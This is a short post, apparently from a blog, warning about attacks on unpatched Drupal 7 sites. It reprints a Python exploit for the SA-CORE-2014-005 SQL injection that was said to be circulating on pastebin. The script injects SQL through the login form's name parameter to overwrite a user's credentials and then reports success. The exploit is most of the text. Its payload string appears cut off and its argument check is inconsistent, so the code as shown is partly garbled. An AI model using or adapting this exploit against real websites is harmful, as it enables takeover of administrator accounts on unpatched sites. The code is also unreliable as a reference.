this is the code that is used to attack #drupal websites that aren't patched yet

to patch go to and nowhere else

this is the code that was posted on pastebin that is used to attack drupal websites - quite simple - and scans and attacks are happing at high-speed

#Drupal 7.x SQL Injection SA-CORE-2014-005
#Creditz to
import urllib2,sys
from drupalpass import DrupalHash #
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
    print "host username password"
    print " admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d'"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
        print "Success!nLogin now with user:%s and pass:%s" % (user, password)

The comments are closed.